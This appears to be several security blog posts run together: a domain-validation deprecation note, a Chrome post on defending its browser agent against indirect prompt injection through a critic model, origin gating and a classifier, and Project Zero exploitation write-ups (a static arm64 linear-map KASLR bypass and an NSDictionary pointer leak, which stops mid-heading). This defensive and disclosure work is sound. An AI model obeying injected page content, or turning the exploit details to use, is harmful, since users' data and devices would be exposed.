To allow affected website operators to transition smoothly, the deprecation will be phased in, with its full security value realized by March 2028.
This effort is a key part of our public roadmap, “Moving Forward, Together,” launched in 2022. Our vision is to improve security by modernizing infrastructure and promoting agility through automation. While "Moving Forward, Together" sets the aspirational direction, the recent updates to the TLS Baseline Requirements turn that vision into policy. This builds on our momentum from earlier this year, including the successful advocacy for the adoption of other security enhancing initiatives as industry-wide standards.
What’s Domain Control Validation?
Domain Control Validation is a security-critical process designed to ensure certificates are only issued to the legitimate domain operator. This prevents unauthorized entities from obtaining a certificate for a domain they do not control. Without this check, an attacker could obtain a valid certificate for a legitimate website and use it to impersonate that site or intercept web traffic.
Before issuing a certificate, a Certification Authority (CA) must verify that the requestor legitimately controls the domain. Most modern validation relies on “challenge-response” mechanisms, for example, a CA might provide a random value for the requestor to place in a specific location, like a DNS TXT record, which the CA then verifies.
Historically, other methods validated control through indirect means, such as looking up contact information in WHOIS records or sending an email to a domain contact. These methods have been proven vulnerable (example) and the recent efforts retire these weaker checks in favor of robust, automated alternatives.
Raising the floor of security
The recently passed CA/Browser Forum Server Certificate Working Group Ballots introduce a phased sunset of the following Domain Control Validation methods. Alternative existing methods offer stronger security assurances against attackers trying to obtain fraudulent certificates – and the alternative methods are getting stronger over time, too.
For everyday users, these changes are invisible - and that’s the point. But, behind the scenes, they make it harder for attackers to trick a CA into issuing a certificate for a domain they don’t control. This reduces the risk that stale or indirect signals, (like outdated WHOIS data, complex phone and email ecosystems, or inherited infrastructure) can be abused. These changes push the ecosystem toward standardized (e.g., ACME), modern, and auditable Domain Control Validation methods. They increase agility and resilience by encouraging site owners to transition to modern Domain Control Validation methods, creating opportunities for faster and more efficient certificate lifecycle management through automation.
These initiatives remove weak links in how trust is established on the internet. That leads to a safer browsing experience for everyone, not just users of a single browser, platform, or website.
Chrome has been advancing the web’s security for well over 15 years, and we’re committed to meeting new challenges and opportunities with AI. Billions of people trust Chrome to keep them safe by default, and this is a responsibility we take seriously. Following the recent launch of Gemini in Chrome and the preview of agentic capabilities, we want to share our approach and some new innovations to improve the safety of agentic browsing.
The primary new threat facing all agentic browsers is indirect prompt injection. It can appear in malicious sites, third-party content in iframes, or from user-generated content like user reviews, and can cause the agent to take unwanted actions such as initiating financial transactions or exfiltrating sensitive data. Given this open challenge, we are investing in a layered defense that includes both deterministic and probabilistic defenses to make it difficult and costly for attackers to cause harm.
Designing safe agentic browsing for Chrome has involved deep collaboration of security experts across Google. We built on Gemini's existing protections and agent security principles and have implemented several new layers for Chrome.
We’re introducing a user alignment critic where the agent’s actions are vetted by a separate model that is isolated from untrusted content. We’re also extending Chrome’s origin-isolation capabilities to constrain what origins the agent can interact with, to just those that are relevant to the task. Our layered defense also includes user confirmations for critical steps, real-time detection of threats, and red-teaming and response. We’ll step through these layers below.
Checking agent outputs with User Alignment Critic
The main planning model for Gemini uses page content shared in Chrome to decide what action to take next. Exposure to untrusted web content means it is inherently vulnerable to indirect prompt injection. We use techniques like spotlighting that direct the model to strongly prefer following user and system instructions over what’s on the page, and we’ve upstreamed known attacks to train the Gemini model to avoid falling for them.
To further bolster model alignment beyond spotlighting, we’re introducing the User Alignment Critic — a separate model built with Gemini that acts as a high-trust system component. This architecture is inspired partially by the dual-LLM pattern as well as CaMeL research from Google DeepMind.
A flow chart that depicts the User Alignment Critic: a trusted component that vets each action before it reaches the browser.
The User Alignment Critic runs after the planning is complete to double-check each proposed action. Its primary focus is task alignment: determining whether the proposed action serves the user’s stated goal. If the action is misaligned, the Alignment Critic will veto it. This component is architected to see only metadata about the proposed action and not any unfiltered untrustworthy web content, thus ensuring it cannot be poisoned directly from the web. It has less context, but it also has a simpler job — just approve or reject an action.
This is a powerful, extra layer of defense against both goal-hijacking and data exfiltration within the action step. When an action is rejected, the Critic provides feedback to the planning model to re-formulate its plan, and the planner can return control to the user if there are repeated failures.
Enforcing stronger security boundaries with Origin Sets
Site Isolation and the same-origin policy are fundamental boundaries in Chrome’s security model and we’re carrying forward these concepts into the agentic world. By their nature, agents must operate across websites (e.g. collecting ingredients on one site and filling a shopping cart on another). But if an unrestricted agent is compromised and can interact with arbitrary sites, it can create what is effectively a Site Isolation bypass. That can have a severe impact when the agent operates on a local browser like Chrome, with logged-in sites vulnerable to data exfiltration. To address this, we’re extending those principles with Agent Origin Sets. Our design architecturally limits the agent to only access data from origins that are related to the task at hand, or data that the user has chosen to share with the agent. This prevents a compromised agent from acting arbitrarily on unrelated origins.
For each task on the web, a trustworthy gating function decides which origins proposed by the planner are relevant to the task. The design is to separate these into two sets, tracked for each session:
Read-only origins are those from which Gemini is permitted to consume content. If an iframe’s origin isn’t on the list, the model will not see that content.
Read-writable origins are those on which the agent is allowed to actuate (e.g., click, type) in addition to reading from.
This delineation enforces that only data from a limited set of origins is available to the agent, and this data can only be passed on to the writable origins. This bounds the threat vector of cross-origin data leaks. This also gives the browser the ability to enforce some of that separation, such as by not even sending to the model data that is outside the readable set. This reduces the model’s exposure to unnecessary cross-site data. Like the Alignment Critic, the gating functions that calculate these origin sets are not exposed to untrusted web content. The planner can also use context from pages the user explicitly shared in that session, but it cannot add new origins without the gating function’s approval. Outside of web origins, the planning model may ingest other non-web content such as from tool calls, so we also delineate those into read-vs-write calls and similarly check that those calls are appropriate for the task.
Iframes from origins that aren’t related to the user’s task are not shown to the model.
Page navigations can happen in several ways: If the planner decides to navigate to a new origin that isn’t yet in the readable set, that origin is checked for relevancy by a variant of the User Alignment critic before Chrome adds it and starts the navigation. And since model-generated URLs could exfiltrate private information, we have a deterministic check to restrict them to known, public URLs. If a page in Chrome navigates on its own to a new origin, it’ll get vetted by the same critic.
Getting the balance right on the first iteration is hard without seeing how users’ tasks interact with these guardrails. We’ve initially implemented a simpler version of origin gating that just tracks the read-writeable set. We will tune the gating functions and other aspects of this system to reduce unnecessary friction while improving security. We think this architecture will provide a powerful security primitive that can be audited and reasoned about within the client, as it provides guardrails against cross-origin sensitive data exfiltration and unwanted actions.
Transparency and control for sensitive actions
We designed the agentic capabilities in Chrome to give the user both transparency and control when they need it most. As the agent works in a tab, it details each step in a work log, allowing the user to observe the agent's actions as they happen. The user can pause to take over or stop a task at any time.
This transparency is paired with several layers of deterministic and model-based checks to trigger user confirmations before the agent takes an impactful action. These serve as guardrails against both model mistakes and adversarial input by putting the user in the loop at key moments.
First, the agent will require a user confirmation before it navigates to certain sensitive sites, such as those dealing with banking transactions or personal medical information. This is based on a deterministic check against a list of sensitive sites. Second, it’ll confirm before allowing Chrome to sign-in to a site via Google Password Manager – the model does not have direct access to stored passwords. Lastly, before any sensitive web actions like completing a purchase or payment, sending messages, or other consequential actions, the agent will try to pause and either get permission from the user before proceeding or ask the user to complete the next step. Like our other safety classifiers, we’re constantly working to improve the accuracy to catch edge cases and grey areas.
Illustrative example of when the agent gets to a payment page, it stops and asks the user to complete the final step.
Detecting “social engineering” of agents
In addition to the structural defenses of alignment checks, origin gating, and confirmations, we have several processes to detect and respond to threats. While the agent is active, it checks every page it sees for indirect prompt injection. This is in addition to Chrome’s real-time scanning with Safe Browsing and on-device AI that detect more traditional scams. This prompt-injection classifier runs in parallel to the planning model’s inference, and will prevent actions from being taken based on content that the classifier determined has intentionally targeted the model to do something unaligned with the user’s goal. While it cannot flag everything that might influence the model with malicious intent, it is a valuable layer in our defense-in-depth.
Continuous auditing, monitoring, response
To validate the security of this set of layered defenses, we’ve built automated red-teaming systems to generate malicious sandboxed sites that try to derail the agent in Chrome. We start with a set of diverse attacks crafted by security researchers, and expand on them using LLMs following a technique we adapted for browser agents. Our continuous testing prioritizes defenses against broad-reach vectors such as user-generated content on social media sites and content delivered via ads. We also prioritize attacks that could lead to lasting harm, such as financial transactions or the leaking of sensitive credentials. The attack success rate across these give immediate feedback to any engineering changes we make, so we can prevent regressions and target improvements. Chrome’s auto-update capabilities allow us to get fixes out to users very quickly, so we can stay ahead of attackers.
Collaborating across the community
We have a long-standing commitment to working with the broader security research community to advance security together, and this includes agentic safety. We’ve updated our Vulnerability Rewards Program (VRP) guidelines to clarify how external researchers can focus on agentic capabilities in Chrome. We want to hear about any serious vulnerabilities in this system, and will pay up to $20,000 for those that demonstrate breaches in the security boundaries. The full details are available in VRP rules.
Looking forward
The upcoming introduction of agentic capabilities in Chrome brings new demands for browser security, and we've approached this challenge with the same rigor that has defined Chrome's security model from its inception. By extending some core principles like origin-isolation and layered defenses, and introducing a trusted-model architecture, we're building a secure foundation for Gemini’s agentic experiences in Chrome. This is an evolving space, and while we're proud of the initial protections we've implemented, we recognize that security for web agents is still an emerging domain. We remain committed to continuous innovation and collaboration with the security community to ensure Chrome users can explore this new era of the web safely.
I've recently been researching Pixel kernel exploitation and as part of this research I found myself with an excellent arbitrary write primitive…but without a KASLR leak. As necessity is the mother of all invention, on a hunch, I started researching the Linux kernel linear mapping.
The Linux Linear Mapping
The linear mapping is a region in the kernel virtual address space that is a direct 1:1 unstructured representation of physical memory. Working with Jann, I learned how the kernel decided where to place this region in the virtual address space. To make it possible to analyze kernel internals on a rooted phone, Jann wrote a tool to call tracing BPF's privileged BPF_FUNC_probe_read_kernel helper, which by design permits arbitrary kernel reads. The code for this is available here. The linear mapping virtual address for a given physical address is calculated by the following macro:
This value (0x80000000) doesn’t look particularly random. In fact, memstart_addrwas theoretically randomized on every boot, but in practice this hasn’t happened for a while on arm64. In fact as of commit 1db780bafa4c it’s no longer even theoretical - virtual address randomization of the linear map is no longer a supported feature in arm64 Linux kernel.
The systemic issue is that memory can (theoretically) be hot plugged in Linux and on Android because of CONFIG_MEMORY_HOTPLUG=y. This feature is enabled on Android due to its usage in VM memory sharing. When new memory is plugged into an already running system, it must be possible for the Linux kernel to address this new memory, including adding it onto the linear map. Android on arm64 uses a page size of 4 KiB and 3-level paging, which means virtual addresses in the kernel are limited to 39 bits, unlike typical X86-64 desktops which use 4-level paging and have 48 bits of virtual address space (for kernel and userspace combined); the linear map has to fit within this space further shrinking the area available for it. Given that the maximum amount of theoretical physical memory is far larger than the entire possible linear map region range, the kernel places the linear map at the lowest possible virtual address so it can theoretically be prepared to handle exorbitant (up to 256GB) quantities of hypothetical future hot-plugged physical memory. While it is not technically necessary to choose between memory hot-plugging support and linear map randomization, the Linux kernel developers decided not to invest the engineering effort to implement memory hot-plugging in a way that preserves linear map randomization.
So we now know that PHYS_OFFSET will always be 0x80000000, and thusly, the phys_to_virt calculation becomes purely static - given any physical address, you can calculate the corresponding linear map virtual address by the following formula:
Compounding this issue, it also happens that on Pixel phones, the bootloader decompresses the kernel itself at the same physical address every boot: 0x80010000.
This means that we can statically calculate a kernel virtual address for any kernel .data entry. Here’s an example of me computing that linear map address for the modprobe_path string in kernel .data on a Pixel 9:
So modprobe_path will always be accessible at the kernel virtual address 0xffffff8001ff2398, in addition to its normal mapping, even with KASLR enabled. In practice, on Pixel devices you can derive a valid virtual address for a kernel symbol by calculating its offset and simply adding a hardcoded static kernel base address of 0xffffff8000010000. In short, instead of breaking the KASLR slide, it is possible to just use 0xffffff8000010000 as a kernel base instead.
The linear mapping memory is even mapped rw for any kernel .data regions. The only consolation that makes using this address slightly less effective than the traditional method of leaking the KASLR slide is that .text regions are not mapped executable - so an attacker cannot use this base for e.g. ROP gadgets or more generally PC control. But oftentimes, a Linux kernel attacker’s goal isn’t arbitrary code execution in kernel context anyway - arbitrary read-write is the more frequently desired primitive.
Impact on devices with kernel physical address randomization
Even on devices where the kernel location is randomized in the physical address space, linear mapping non-randomization still softens the kernel considerably to attempts at exploitation. This is particularly because techniques that involve spraying memory (either kernel structures or even userland mmap’s!) can land at predictable physical addresses - and those physical addresses are easily referenceable in kernel virtual address space through the linear map. That potentially gives an attacker a methodology for placing kernel data structures or even simply attacker-controlled userland memory at a known kernel virtual address. I created a simple program that allocated (via mmap and page fault) a substantial quantity (~5 GB) of physical memory on a Samsung S23, then used /proc/pagemap to create a list of which physical page frame numbers (pfns) were allocated. I ran this program 100 times (rebooting in between each time), then counted how often each pfn appeared across the 100 execution cycles. The set of pfns and their counts for how often they appeared were then converted into an image where each pfn is represented by a single pixel. The brighter the green of a pixel, the more often that page was attacker controlled, with a white pixel representing a pfn that was allocated every time. A black pixel represents a pfn that was never allocated - often because those pfn numbers are not mapped to physical memory or because they are used every time in a deterministic way. A big thank you to Jann Horn for developing the tool to create this image from the data that I collected.
This data exemplifies the non-homogenous reliability of pfn allocation to userland mappings, albeit on a device that was only just rebooted. There are ranges of pfns that are allocated quite reliably, and other ranges that are quite unreliable (but still occasionally used). For example, here’s a range of pfns surrounding one of the pages that was allocated 100 times in a row. I suspect this sample is representative of the practical reliability of this technique for placing desired data at a known kernel address for at least a newly rebooted device.
While reliability may suffer on a device that hasn’t rebooted in some time, it remains high enough to be inviting to real-world attackers. Being able to place arbitrarily readable and writable data at a known kernel virtual address is a powerful exploitation primitive as an attacker can much more easily forge kernel data structures or objects and, for example, emplace pointers to those objects in heap sprays attacking UAF issues.
The Prognosis
I reported these two separate issues, lack of linear map randomization, and kernel lands at static physical address in Pixel, to the Linux kernel team and Google Pixel respectively. However both of these issues are considered intended behavior. While Pixel may introduce randomized physical kernel load addresses at some later point as a feature, there are no immediate plans to resolve the lack of randomization of the Linux kernel’s linear map on arm64.
Conclusion
Three years ago, I wrote on the state of x86 KASLR and noted how “it is probably time to accept that KASLR is no longer an effective mitigation against local attackers and to develop defensive code and mitigations that accept its limitations.” While it remains true that KASLR should not be trusted to prevent exploitation, particularly in local contexts, it is regrettable that the attitude around Linux KASLR is so fatalistic that putting in the engineering effort to preserve its remaining integrity is not considered to be worthwhile. The joint effect of these two issues dramatically simplified what might otherwise have been a more complicated and likely less reliable exploit. While side-channel attacks do impact the long-term viability of KASLR on all architectures, it is notable that Project Zero and the Google Threat Intelligence Group have yet to see a hardware side-channel attack for bypassing KASLR on Android in the wild. Additionally, KASLR still plays an important role in mitigating any remote kernel exploitation attempts. It is valuable from a security in-depth perspective to recognize the impact KASLR has on exploit complexity and reliability in real-world scenarios. In the future, we hope to see changes to the Linux kernel linear mapping and memory hot-plugging implementation to make this a less inviting target for attackers. Randomizing the location of the linear map in the virtual address space, increasing the entropy in physical page allocation, and randomizing the location of the kernel in the physical address space are all concrete steps that can be taken that would improve the overall security posture of Android, the Linux kernel, and Pixel.
One year from now, with the release of Chrome 154 in October 2026, we will change the default settings of Chrome to enable “Always Use Secure Connections”. This means Chrome will ask for the user's permission before the first access to any public site without HTTPS.
The “Always Use Secure Connections” setting warns users before accessing a site without HTTPS
Chrome Security's mission is to make it safe to click on links. Part of being safe means ensuring that when a user types a URL or clicks on a link, the browser ends up where the user intended. When links don't use HTTPS, an attacker can hijack the navigation and force Chrome users to load arbitrary, attacker-controlled resources, and expose the user to malware, targeted exploitation, or social engineering attacks. Attacks like this are not hypothetical—software to hijack navigations is readily available and attackers have previously used insecure HTTP to compromise user devices in a targeted attack.
Since attackers only need a single insecure navigation, they don't need to worry that many sites have adopted HTTPS—any single HTTP navigation may offer a foothold. What's worse, many plaintext HTTP connections today are entirely invisible to users, as HTTP sites may immediately redirect to HTTPS sites. That gives users no opportunity to see Chrome's "Not Secure" URL bar warnings after the risk has occurred, and no opportunity to keep themselves safe in the first place.
To address this risk, we launched the “Always Use Secure Connections” setting in 2022 as an opt-in option. In this mode, Chrome attempts every connection over HTTPS, and shows a bypassable warning to the user if HTTPS is unavailable. We also previously discussed our intent to move towards HTTPS by default. We now think the time has come to enable “Always Use Secure Connections” for all users by default.
Now is the time.
For more than a decade, Google has published the HTTPS transparency report, which tracks the percentage of navigations in Chrome that use HTTPS. For the first several years of the report, numbers saw an impressive climb, starting at around 30-45% in 2015, and ending up around the 95-99% range around 2020. Since then, progress has largely plateaued.
HTTPS adoption expressed as a percentage of main frame page loads
This rise represents a tremendous improvement to the security of the web, and demonstrates that HTTPS is now mature and widespread. This level of adoption is what makes it possible to consider stronger mitigations against the remaining insecure HTTP.
Balancing user safety with friction
While it may at first seem that 95% HTTPS means that the problem is mostly solved, the truth is that a few percentage points of HTTP navigations is still a lot of navigations. Since HTTP navigations remain a regular occurrence for most Chrome users, a naive approach to warning on all HTTP navigations would be quite disruptive. At the same time, as the plateau demonstrates, doing nothing would allow this risk to persist indefinitely. To balance these risks, we have taken steps to ensure that we can help the web move towards safer defaults, while limiting the potential annoyance warnings will cause to users.
One way we're balancing risks to users is by making sure Chrome does not warn about the same sites excessively. In all variants of the "Always Use Secure Connections" settings, so long as the user regularly visits an insecure site, Chrome will not warn the user about that site repeatedly. This means that rather than warn users about 1 out of 50 navigations, Chrome will only warn users when they visit a new (or not recently visited) site without using HTTPS.
To further address the issue, it's important to understand what sort of traffic is still using HTTP. The largest contributor to insecure HTTP by far, and the largest contributor to variation across platforms, is insecure navigations to private sites. The graph above includes both those to public sites, such as example.com, and navigations to private sites, such as local IP addresses like 192.168.0.1, single-label hostnames, and shortlinks like intranet/. While it is free and easy to get an HTTPS certificate that is trusted by Chrome for a public site, acquiring an HTTPS certificate for a private site unfortunately remains complicated. This is because private names are "non-unique"—private names can refer to different hosts on different networks. There is no single owner of 192.168.0.1 for a certification authority to validate and issue a certificate to.
HTTP navigations to private sites can still be risky, but are typically less dangerous than their public site counterparts because there are fewer ways for an attacker to take advantage of these HTTP navigations. HTTP on private sites can only be abused by an attacker also on your local network, like on your home wifi or in a corporate network.
If you exclude navigations to private sites, then the distribution becomes much tighter across platforms. In particular, Linux jumps from 84% HTTPS to nearly 97% HTTPS when limiting the analysis to public sites only. Windows increases from 95% to 98% HTTPS, and both Android and Mac increase to over 99% HTTPS.
In recognition of the reduced risk HTTP to private sites represents, last year we introduced a variant of “Always Use Secure Connections” for public sites only. For users who frequently access private sites (such as those in enterprise settings, or web developers), excluding warnings on private sites significantly reduces the volume of warnings those users will see. Simultaneously, for users who do not access private sites frequently, this mode introduces only a small reduction in protection. This is the variant we intend to enable for all users next year.
“Always Use Secure Connections,” available at chrome://settings/security
In Chrome 141, we experimented with enabling “Always Use Secure Connections” for public sites by default for a small percentage of users. We wanted to validate our expectations that this setting keeps users safer without burdening them with excessive warnings.
Analyzing the data from the experiment, we confirmed that the number of warnings seen by any users is considerably lower than 3% of navigations—in fact, the median user sees fewer than one warning per week, and the ninety-fifth percentile user sees fewer than three warnings per week..
Understanding HTTP usage
Once “Always Use Secure Connections” is the default and additional sites migrate away from HTTP, we expect the actual warning volume to be even lower than it is now. In parallel to our experiments, we have reached out to a number of companies responsible for the most HTTP navigations, and expect that they will be able to migrate away from HTTP before the change in Chrome 154. For many of these organizations, transitioning to HTTPS isn't disproportionately hard, but simply has not received attention. For example, many of these sites use HTTP only for navigations that immediately redirect to HTTPS sites—an insecure interaction which was previously completely invisible to users.
Another current use case for HTTP is to avoid mixed content blocking when accessing devices on the local network. Private addresses, as discussed above, often do not have trusted HTTPS certificates, due to the difficulties of validating ownership of a non-unique name. This means most local network traffic is over HTTP, and cannot be initiated from an HTTPS page—the HTTP traffic counts as insecure mixed content, and is blocked. One common use case for needing to access the local network is to configure a local network device, e.g. the manufacturer might host a configuration portal at config.example.com, which then sends requests to a local device to configure it.
Previously, these types of pages needed to be hosted without HTTPS to avoid mixed content blocking. However, we recently introduced a local network access permission, which both prevents sites from accessing the user’s local network without consent, but also allows an HTTPS site to bypass mixed content checks for the local network once the permission has been granted. This can unblock migrating these domains to HTTPS.
Changes in Chrome
We will enable the "Always Use Secure Connections" setting in its public-sites variant by default in October 2026, with the release of Chrome 154. Prior to enabling it by default for all users, in Chrome 147, releasing in April 2026, we will enable Always Use Secure Connections in its public-sites variant for the over 1 billion users who have opted-in to Enhanced Safe Browsing protections in Chrome.
While it is our hope and expectation that this transition will be relatively painless for most users, users will still be able to disable the warnings by disabling the "Always Use Secure Connections" setting.
If you are a website developer or IT professional, and you have users who may be impacted by this feature, we very strongly recommend enabling the "Always Use Secure Connections" setting today to help identify sites that you may need to work to migrate. IT professionals may find it useful to read our additional resources to better understand the circumstances where warnings will be shown, how to mitigate them, and how organizations that manage Chrome clients (like enterprises or educational institutions) can ensure that Chrome shows the right warnings to meet those organizations' needs.
Looking Forward
While we believe that warning on insecure public sites represents a significant step forward for the security of the web, there is still more work to be done. In the future, we hope to work to further reduce barriers to adoption of HTTPS, especially for local network sites. This work will hopefully enable even more robust HTTP protections down the road.
Posted by Chris Thompson, Mustafa Emre Acer, Serena Chen, Joe DeBlasio, Emily Stark and David Adrian, Chrome Security Team
Some time in 2024, during a Project Zero team discussion, we were talking about how remote ASLR leaks would be helpful or necessary for exploiting some types of memory corruption bugs, specifically in the context of Apple devices. Coming from the angle of "where would be a good first place to look for a remote ASLR leak", this led to the discovery of a trick that could potentially be used to leak a pointer remotely, without any memory safety violations or timing attacks, in scenarios where an attack surface can be reached that deserializes attacker-provided data, re-serializes the resulting objects, and sends the re-serialized data back to the attacker.
The team brainstormed, and we couldn't immediately come up with any specific attack surface on macOS/iOS that would behave this way, though we did not perform extensive analysis to test whether such attack surface exists. Instead of targeting a real attack surface, I tested the technique described here on macOS with an artificial test case that uses NSKeyedArchiver serialization as the target. Because of the lack of demonstrated real-world impact, I reported the issue to Apple without filing it in our bugtracker. It was fixed in the 31 Mar 2025 security releases. Links to Apple code in this post go to an outdated version of the code that hasn't been updated in years, and descriptions of how the code works refer to the old unfixed version.
I decided to write about the technique since it is kind of intriguing and novel, and some of the ideas in it might generalize to other contexts. It is closely related to a partial pointer leak and another pointer ordering leak that I discovered in the past, and shows how pointer-keyed data structures can be used to leak addresses under ideal circumstances.
Background - the tech tree
hashDoS
To me, the story of this issue begins in 2011, when the hashDoS attack was presented at 28C3 (slides, recording). In essence, hashDoS is a denial-of-service attack on services (in particular web servers) that populate hash tables with lots of attacker-controlled keys (like POST parameters). It is based on the observation that many hash table implementations have O(1) complexity per insert/lookup operation in the average case, but O(n) complexity for the same operations in the worst case (where the hashes of all keys land in the same hash bucket, and the hash table essentially turns into something like a linked list or an unsorted array depending on how it is implemented). In particular if the hash function used for keys is known to the attacker, then by constructing a request full of parameters whose keys all map to the same hash bucket, an attacker can cause the server to spend O(n²) time processing such a request; this turned out to be enough to keep a web server's CPU saturated using ridiculously small amounts of network traffic.
When choosing a sorting or data lookup algorithm to be used for a normal application, people are usually optimizing the typical case. However, for IDS [intrusion detection systems] the worst case scenario should always be considered: an attacker can supply our IDS with whatever data she likes. If the IDS is fail-open, she would then be able to bypass it, and if it's fail-close, she could cause a DoS for the entire protected system.
Let me illustrate this by an example. In scanlogd, I'm using a hash table to lookup source addresses. This works very well for the typical case as long as the hash table is large enough (since the number of addresses we keep is limited anyway). The average lookup time is better than that of a binary search. However, an attacker can choose her addresses (most likely spoofed) to cause hash collisions, effectively replacing the hash table lookup with a linear search. Depending on how many entries we keep, this might make scanlogd not be able to pick new packets up in time. This will also always take more CPU time from other processes in a host-based IDS like scanlogd.
[...]
It is probably worth mentioning that similar issues also apply to things like operating system kernels. For example, hash tables are widely used there for looking up active connections, listening ports, etc. There're usually other limits which make these not really dangerous though, but more research might be needed.
hashDoS as a timing attack
From a slightly different perspective, the central observation of hashDoS is: If an attacker can insert a large number of chosen keys into a hash table (or hash set) and knows which hash buckets these keys hash to, then the attacker can (depending on hash table implementation details) essentially slow down future accesses to a chosen hash bucket.
This becomes interesting if the attacker can cause the insertion of other keys whose hashes are secret into the same hash table. In practice, this can for example happen with hash tables which support mixing multiple key types together, like JavaScript's Map. Back in 2016, in the Firefox implementation, int32 numbers were hashed with a fixed hash function ScrambleHashCode(number), while strings were atomized/interned and then hashed based on their virtual address. That made it possible to first fill an attacker-chosen hash table bucket with lots of elements, then insert a string, observe whether its insertion is fast or slow, and determine from that whether the string's hash matches the attacker-chosen hash bucket.
With some tricks relying on a pattern in the addresses of interned single-character strings in Firefox, that made it possible to leak the lower 32 bits of a heap address through Map insertions and timing measurements. For more details, see the original writeup and bug report. Of course, nowadays that kind of timing-based in-process partial pointer leak from JavaScript would be considered less interesting, since it is generally assumed that JavaScript can read all memory in the same process anyway...
A takeaway from this is: When pointers are used as the basis for object hash codes, this can leak pointers through side channels in keyed data structures.
Linux: object ordering leak through in-order listing of a pointer-keyed tree
As I noted in a blog post a few years ago, on Linux, it is possible for unprivileged userspace to discover in what order struct file instances are stored in kernel virtual memory by reading from /proc/self/fdinfo/<epoll fd> - this file lists all files that are watched by an epoll instance by iterating through a red-black tree that is (essentially) sorted by the virtual address of the referenced struct file, so the data given to userspace is sorted in the same way.
(As I noted in that post, this could be particularly interesting for breaking probabilistic memory safety mitigations that rely on pointer tagging. If the highest bits of pointers are secret tag bits, and an attacker can determine the order of the addresses (including tag bits) of objects, the attacker can infer whether an object's tag changed after reallocation.)
A takeaway from this is: Keyed data structures don't just leak information about object hash codes through timing; iterating over a keyed data structure can also generate data whose ordering reveals information about object hash codes.
Serialization attacks
There are various approaches to serializing an object graph. On one side of the spectrum is schema-based serialization, where ideally:
serializable types with their members are declared separately from other types
fields explicitly declare which other types they can point to (there are no generic pointers that can point to anything)
deserialization starts from a specific starting type
On the other side of the serialization spectrum are things like classic Java serialization (without serialization filters), where essentially any class marked as Serializable can be deserialized, serialized fields can often flexibly point to lots of different types, and therefore serialized data can also have a lot of control over the shape of the resulting object graph. There is a lot of public research on the topic of "serialization gadget chains" in Java, where objects can be combined such that deserializing them results in things like remote code execution. This type of serialization is generally considered to be unsafe for use across security boundaries, though Android exposes it across local security boundaries.
Somewhere in the middle of this spectrum is serialization that is fundamentally built like unsafe deserialization, but adds some coarse filters that only allow deserialized objects to have types from an allowlist to make it safe. In Java, that is called "serialization filtering". This is also approximately the behavior of Apple's NSKeyedUnarchiver.unarchivedObjectOfClasses, which this post focuses on.
An artificial test case
The goal of the technique described in this post is to leak a pointer to the "shared cache" (a large mapping which is at the same virtual address across all processes on the system, whose address only changes on reboot) through a single execution of the following test case, which uses NSKeyedUnarchiver.unarchivedObjectOfClasses to deserialize an attacker-supplied object graph consisting of the types NSDictionary, NSNumber, NSArray and NSNull, re-serializes the result, and writes back the resulting serialized data:
(The test case also allows NSString but I think that was irrelevant.)
Building blocks
The NSNull / CFNull singleton
The CFNull type is special: There is only one singleton instance of it, kCFNull, implemented in CFBase.c, which is stored in the shared cache. When you deserialize an NSNull object, this doesn't actually create a new object - instead, the singleton is used.
In the CFRuntimeClass for CFNull, __CFNullClass, no hash handler is provided. When CFHash is called on an object with a type like __CFNullClass that does not implement a ->hash handler, the address of the object is used as the hash code.
Pointer-based hashing is not specific to NSNull; but there probably aren't many other types for which deserialization uses singletons in the shared cache. There are probably way more types for which instances' hashes are heap addresses.
NSNumber
The NSNumber type encapsulates a number and supports several types of numbers; its hash handler __CFNumberHash hashes 32-bit integers with _CFHashInt, which pretty much just performs a multiplication with some big prime number.
NSDictionary
Instances of the NSDictionary type are immutable hash tables and can contain arbitrarily-typed keys. Key hashes are mapped to hash table buckets using a simple modulo operation: hash_code % num_buckets. The number of hash buckets in a NSDictionaryis always a prime number (see __CFBasicHashTableSizes); hash table sizes are chosen based on __CFBasicHashTableCapacities such that hash tables are normally roughly half-full (around 38%-62%), though the sizing is a bit different for small sizes. These are probing-style hash tables; so rather than having a linked list off each hash bucket, collisions are handled by finding alternate buckets to store colliding elements in using the policy __kCFBasicHashLinearHashingValue / FIND_BUCKET_HASH_STYLE == 1, under which insertion scans forward through the hash table buckets.
I haven't found source code for serialization of NSDictionary, but it appears to happen in the obvious way, by iterating through the hash buckets in order.
The attack
The basic idea: Infoleak through key ordering in serialized NSDictionary
If a targeted process fills an NSDictionary with attacker-chosen NSNumber keys (through deserialization), the attacker can control which hash buckets will be used by using numbers for which the number's hash modulo the hash table size results in the desired bucket index. If the targeted process then inserts an NSNull key (still as part of the same deserialization), and then serializes the resulting NSDictionary, the location of the NSNull key in the dictionary's serialized keys will reveal information about the hash of NSNull.
In particular, the attacker can create a pattern like this using NSNumber keys (where # is a bucket occupied by an NSNumber, and _ is a bucket left empty), where even-numbered buckets are occupied and odd-numbered buckets are empty, here with the example of a hash table of size 7:
bucketindex:0123456
bucketcontents:#_#_#_#
This leaves three spots where the NSNull could be inserted (marked with !):
At index 1 (#!#_#_#). This happens if hash_code % num_buckets is 6, 0, or 1. (For 6 and 0, insertion would scan linearly through the buckets until finding the free bucket at index 1.) This would result in NSNull being second in the serialized data.
At index 3 (#_#!#_#). This happens if hash_code % num_buckets is 2 or 3. This would result in NSNull being third in the serialized data.
At index 5 (#_#_#!#). This happens if hash_code % num_buckets is 4 or 5. This would result in NSNull being fourth in the serialized data.
If the serialized data is then sent back to the attacker, the attacker can distinguish between these three states (based on the index of the NSNull key in the serialized data), and learn in which range hash_code % num_buckets is.
Extending it: Leaking the entire bucket index
If the attack from the last section is repeated with the following pattern (occupying odd-numbered buckets and leaving even-numbered ones empty), this yields more information about hash_code % num_buckets:
0123456
_#_#_#_
(Caveat: Don't think too hard about how a hash table with 3 elements would use only 3 buckets and therefore wouldn't look like this. The actual reproducer uses hash tables with >=23 buckets.)
Now we have four spots where the NSNull could be inserted:
At index 0, if hash_code % num_buckets is 0.
At index 2, if hash_code % num_buckets is 1 or 2.
At index 4, if hash_code % num_buckets is 3 or 4.
At index 6, if hash_code % num_buckets is 5 or 6.
By combining the information from an NSDictionary that uses the even-buckets-occupied pattern and an NSDictionary that uses the odd-buckets-occupied pattern, the exact value of hash_code % num_buckets can be determined; for example, if the first pattern results in #_#!#_# and the second pattern results in _#!#_#_, then hash_code % num_buckets is 2.
So by sending a serialized NSArray containing two NSDictionary instances with these patterns of NSNumber and NSNull keys to some targeted process, and then receiving a re-serialized copy from the victim, an attacker can determine hash_code % num_buckets for NSArray.
Some math: Leaking the entire hash_code
